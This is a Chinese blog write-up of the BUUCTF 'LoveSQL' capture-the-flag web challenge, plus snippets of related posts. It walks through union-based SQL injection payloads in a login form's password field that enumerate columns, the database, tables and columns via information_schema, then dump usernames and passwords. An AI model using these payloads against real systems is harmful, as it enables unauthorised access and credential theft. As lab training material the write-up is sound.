BUUCTF_[极客大挑战 2019]LoveSQL解题思路

最新推荐文章于 2024-04-17 05:22:37 发布
最新推荐文章于 2024-04-17 05:22:37 发布
阅读量547 收藏 10
点赞数 10
分类专栏: CTF 文章标签: web安全 网络安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhai_jia_hui/article/details/135490136
版权

启动环境发现是一个登录窗口,尝试提交数据,发现密码字段存在注入,并且是可以显示字段的SQL注入点。

需要注意的是输入的内容会自动进行url编码才能正常执行,不能直接再burp里改。

输入:' order by 1#

返回:NO,Wrong username password!!!

逐步增加到4

输入:' order by 4#

返回:Unknown column '4' in 'order clause'

判断字段数为4,使用联合注入,获得数据库geek。

' union select 1,2,3#

' union select 1,2,database()#

接下来利用group_concat函数查询对应数据表为l0ve1ysq1

' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #

继续利用该函数查询数据表中的字段为id,username,password

' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#

最后查询字段里的内容,查询出来发现flag再password字段里,所以直接查password字段也行。

' union select 1,2,group_concat(id,0x7e,username,0x7e,password) from geek.l0ve1ysq1#

时光不改
关注
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2_登录模块_极客班Android专业_蓦然项目LabManual1
08-03
的背景。在res/drawable目录下新建两个文件:text_shape.xml和button_shape.xml,分别定义如下:android:shape=
微型计算机_极客_2009-05.pdf
03-26
微型计算机_极客_2009-05.pdf
BUUCTF-LoveSQL1
m0_74167420的博客
03-13 896
构造新的payload:username=adminn ' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1。(2)测试了几次到100也没有爆出字段,也将#进行了url编码,更换万能账户再次测试,测试成功。(1)在成功登录的基础上使用联合注入语法知识进行,首先使用 order by 判断字段数。表爆出成功,发现两个表名。
4_广场模块_极客班Android专业_蓦然项目LabManual_v0.61
08-03
列表的背景颜色这里先不改,因为列表右侧的小三角箭头也是定义在背景里的,等小编找到图标资源,以后再更改。(4)整合页面布局打开 res/layout/activi
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF Web [极客挑战 2019]LoveSQL
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 一、题目简介 进入题目连接是一个「登录」界面 登录「成功」会显示当前用户的账号和密码 登录「失败」则会则会提示错误的用户名和密码 二、思路分析         这一关是「SQL注入」漏洞,注入点.
CTF---BUUCTF之[极客挑战 2019]LoveSQL 1
weixin_44632787的博客
06-17 1475
CTF练习题里的BUUCTF之[极客挑战 2019]LoveSQL 1 启动我们的挑战项目,这题一看就知道是SQL注入了。。。而且跟上一次做的好像,不知道这一次的难不难。 先来随便输入个“万能钥匙”吧!1’ or 1=1 # 嗯哼?这个是MD5加密吗? 上网找一下MD5在线加解密的网站:https://www.cmd5.com/。 看看能不能得到我们想要的答案 果然没解出来,照理说CTF的题不会这么简单。这个可能是一个陷阱,或者是另外一种解法(反正我不会…)。所以,我们试试正常的解题思路吧!先用
[极客挑战 2019]LoveSQL 1(详细版)
qq_61861243的博客
09-26 648
1、首先打开网站页面,一看是一个登录界面,我们想到运用SQL注入,利用密码1’ or 1=1登陆一下,得到admin用户以及他的密码。2、根据之前获得的信息对我找flag没有啥有用的信息,我想到利用SQL语句查询一下刚刚得到的admin所在表的列信息,这里我使用1%27order by 4 %23 与 1%27order by 3 %23 对比判断出表的列数为3。(用%27替代’ , %23替代#)
[极客挑战 2019]LoveSQL
1ance's blog
11-23 791
文章目录环境解题思路总结 环境 BUUCTF在线环境,启动靶机,获取链接。 http://4c0c8173-cd8d-4da6-b36f-1136831030bf.node4.buuoj.cn:81/ 解题思路 访问链接,发现跟之前做的EasySQL一样的页面,上次是万能密码直接进入了获取了flag,先试试万能密码。 使用万能密码admin' or '1'='1 获得了一串字符串,拿去MD5解密没有解出来。 接着思考,题目提示是SQl注入,而万能密码能登进来说明是存在字符型注入的,所以看看用户表有多少
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): #print s
系统工具_应用工具_极客多标签文件管理器免费下载-无插件-下载地址直达.zip
09-20
系统工具_应用工具_极客多标签文件管理器免费下载-无插件-下载地址直达.zip
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
3_注册模块_极客班Android专业_蓦然项目LabManual_v1.11
08-03
3_注册模块_极客班Android专业_蓦然项目LabManual_v1.11
微型计算机_极客_2009-01.pdf
03-26
微型计算机_极客_2009-01.pdf
BUUCTF Web [极客挑战 2019]LoveSQL_buuctf lovesql,2024年最新网络安全系统工程师面试宝典
最新发布
【2023EI会议列表】
04-17 981
进入题目连接是一个「登录」界面登录「成功」会显示当前用户的账号和密码登录「失败」则会则会提示错误的用户名和密码。
BUUCTF--Web篇详细wp
Aluxian_的博客
04-10 3904
BUUCTF--Web篇详细wp。
BUUCTF解题web十一道
qq_45837896的博客
05-26 1231
[2019极客挑战]EASYSQL 到页面里发现是一个登录框 回想注入思路,先判断注入类型,然后尝试登陆绕过 使用万能密码username=’ or 1=1 or ‘1’=‘1’# &password=asd [2019极客挑战]HAVEFUN 打开页面发现是一只猫猫,点了两下拖了两下发现没什么 然后老规矩F12查看有没有提示信息 发现有这么一段代码,可以对页面传参cat,传cat='dog’就执行了一段代码,不知道是什么,尝试了一下直接出了flag… [SUCTF]EASYSQL 进入发现是
buuctf web 极客挑战2019
08-24
嗨!对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计和网络协议等。参赛者需要通过解决各个题目来获取相应的flag,以证明自己的能力。如果你有具体的问题或需要更详细的信息,我会尽力帮助你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

时光不改

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值